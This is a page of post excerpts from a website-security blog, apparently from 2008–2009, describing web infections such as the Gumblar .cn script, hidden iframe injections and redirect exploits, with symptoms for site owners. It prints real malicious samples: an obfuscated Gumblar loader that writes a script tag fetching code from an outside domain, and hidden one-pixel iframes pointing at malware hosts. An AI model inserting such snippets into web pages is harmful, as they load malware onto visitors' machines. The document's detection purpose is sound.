Unmask Parasites. Blog.
msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Gumblar .cn Exploit – 12 Facts About This Injected Script

07 May 09   Filed in Website exploits with 194 Comments

I’ve been watching this exploit for about a week now.  During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);
Continue »»


Tags:

Another Type of IFrame Hack (PHP Exploit)

29 Apr 09   Filed in Website exploits with 36 Comments

This is a quick post about yet another type of hidden iframes injected into legitimate web pages.

The HTML code may look like this:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Domain names may vary, and the number of different iframes injected into a single web page may be different. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is some hexadecimal number.
Continue »»


Tags:

Malicious “Income” IFrames from .CN Domains

15 Apr 09   Filed in Website exploits with 78 Comments

New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.

The html code looks like this

<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150.  The iframes load pages with paths similar to  “in.cgi?incomeNN”, where NN is some arbitrary number.
Continue »»


Tags:

Malicious “Stats” from 84.244.138.0

02 Apr 09   Filed in Website exploits with 2 Comments

This is a post about this week’s prevalent website infection. There are quite a few modifications but they all link to the same IP-address: 84 .244 .138 .55 and if Google detects the malicious scripts it blacklists infected sites reporting that “Malicious software is hosted on 1 domain(s), including 84.244.138.0/.

I’ve seen two modification of the malicious script:
Continue »»


Tags:

Fake Yahoo Counter Script Unmasked

12 Mar 09   Filed in Website exploits with 1 Comment

Fake Yahoo! counter script injection has been the most “popular” security problem for the last couple of week in the “Malware & hacked sites” section of the Google’s webmaster help forum.

This script is not a new exploit but it looks like we have a new surge that affects thousands of sites, so I decided to review it. Continue »»


Tags:

Black Hat SEO for Virus Dissemination.

24 Jan 09   Filed in Website exploits with Comments Off

In the previous post I talked about the exploit that redirected Googlebot to malicious sites. This time I’ll talk about how I investigated this issue and what I discovered.

This started about a week ago when I noticed a few sites with suspicious redirects in Unmask Parasites reports. There was a chain of two 301 redirects: -> “http://bablo .me .uk/”  -> “http://www. 524045. secki .info/”. Sometimes “bablo me uk” redirected to other sites that always contained a random 6 digit number as a subdomain name.  I decided to find out what was going on. Continue »»


Tags:

Exploit Redirects Googlebot to Malware Sites (Bablo me uk).

19 Jan 09   Filed in Website exploits with 20 Comments

Some time ago I noticed a few sites with a suspicious chain of redirects that always started with “http://bablo .me .uk/” followed with a site with a random 6 digit number as a sub-domain name (e.g. http://www. 524045. secki .info/).

I decided to follow the redirects and find out where they lead to. What I found was a server hosting hundreds of sites optimized for trojan dissemination. I’ll blog about my investigation later. Now let’s talk about the things web masters should know about this exploit.

Symptoms

  • PHP-dirven site. (Especially Joomla-driven)
  • Problems with having web site properly indexed by Google. Some pages don’t get indexed, some pages disappear from the index. If not – it’s only a matter of time.
  • When checking web pages in Unmask Parasites, there is a chain of two 301 redirects reported and the first redirect points to “http://bablo .me .uk/”. However when opening the same pages in a browser, no redirection occurs (even when clicking on Google search results.)

Continue »»


Tags:

Gogo2me – Hidden IFrame Injection.

14 Jan 09   Filed in Website exploits with 29 Comments

New Year has come with a new surge of website exploits. I see many help requests on BadwareBusters caused by the same problem.

Symptoms

  1. In Google search results, your site links are marked with a “This site may harm your computer” warning and you see an abrupt decrease in Google search traffic.
  2. When trying to open your web pages, users of Firefox 3 and Google Chrome browsers see a warning that your site is an “attack site”.
  3. If your site is registered with Google Webmaster Tools or AdWords, you receive an email from Google notifying that your site is a reported attack site and some of your web pages link to the following sites that host malicious software: 94 .247 .2 .0/ and gogo2me .net/
  4. Google’s Safe Browsing Diagnostics pages for your site also report that your site links to 94 .247 .2 .0/ and gogo2me .net/

Continue »»


Tags:

Antivirus 360 redirection exploit

19 Dec 08   Filed in Website exploits with 3 Comments
Antivirus 360 exploit

This is a new post in the series about the Antivirus 2009 .htaccess exploit. I want to share some new information on the topic.

Continue »»


Tags:

Unmasking the Antivirus 2009 .htaccess Exploit.

08 Dec 08   Filed in Website exploits with 16 Comments

In the previous post I described the symptoms of the Antivirus 2009 .htaccess exploit, how to detect it and get rid of it.

This time I’m going to further unmask this exploit and show how it works.

Continue »»


Tags:
« Previous Posts
Next Posts »
sidebartop

About this blog

Occasional posts from the developer of
Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).

Exploit reviews, security tips, and all that jazz.

This blog in the news

Get free updates:  RSS   Email   Twitter   G+
sidebarbottom
sidebartop

Recent Posts

sidebarbottom
sidebartop

Categories

sidebarbottom
sidebartop

Recent Comments

sidebarbottom
sidebartop
advertisement

Has your website been hacked?

We're here to help you get back up and running with minimal downtime!

Call us now at 1-800-639-6442

www.HackRepair.com
sidebarbottom
sidebartop
sidebarbottom
© Unmask Parasites. Blog. / Design: Smashing Wordpress Themes